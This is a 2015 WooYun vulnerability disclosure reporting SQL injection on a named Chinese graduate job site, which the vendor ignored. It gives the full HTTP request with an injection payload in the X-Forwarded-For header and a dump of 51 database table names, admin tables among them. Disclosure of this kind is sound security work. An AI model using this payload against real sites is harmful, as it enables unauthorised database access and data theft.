当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149681

漏洞标题:应届生求职网某SQL注入

相关厂商:应届生求职网

漏洞作者: kobin97

提交时间:2015-10-27 10:10

修复时间:2015-11-01 10:12

公开时间:2015-11-01 10:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-11-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

应届生求职网某SQL注入

详细说明:

X-Forwarded-For 插件又起作用了。。
http://www.yingjiesheng.com/click.php?ID=1121&RedirectUrl=http%3A%2F%2Fs.yingjiesheng.com%2F
GET /click.php?ID=1121&RedirectUrl=http%3A%2F%2Fs.yingjiesheng.com%2F HTTP/1.1
Host: www.yingjiesheng.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Forwarded-For: 27.27.27.27'+if((1=1 *),(select 1 union select 2),(1=1)) + '
Connection: close

漏洞证明:

0.png


Database: yingjiesheng_zz
[51 tables]
+---------------------------------------+
| t_ad_index |
| t_ad_item |
| t_ad_status |
| t_ad_visitor_bak |
| t_ad_visitor_log |
| t_admin |
| t_admin_group |
| t_api_history |
| t_areaad |
| t_areaad_setting |
| t_baocuo |
| t_campus_schedule |
| t_category_industry |
| t_commend_job |
| t_commend_job_archive |
| t_commend_job_more |
| t_company |
| t_companyzt |
| t_custom_config |
| t_disturb_text |
| t_navigate_category |
| t_navigate_info |
| t_navigate_module |
| t_net_applicate |
| t_net_applicate_order |
| t_official_quiz |
| t_operate_log |
| t_reprint |
| t_reprint_archive |
| t_reprint_area |
| t_reprint_areaurl |
| t_reprint_autocat |
| t_reprint_autocat_20130601 |
| t_reprint_autocat_20141231 |
| t_reprint_autocat_html |
| t_reprint_class |
| t_reprint_classreport |
| t_reprint_classurl |
| t_reprint_dz |
| t_reprint_dzurl |
| t_reprint_emaildb |
| t_reprint_tag |
| t_reprint_text |
| t_reprint_text_archive |
| t_reprint_titlist |
| t_reprint_zhiwei |
| t_reprint_zhiweiurl |
| t_sms_express |
| t_tag |
| t_titlist_autocat_del |
| t_yellow_page |
+---------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 kobin97@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-01 10:12

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无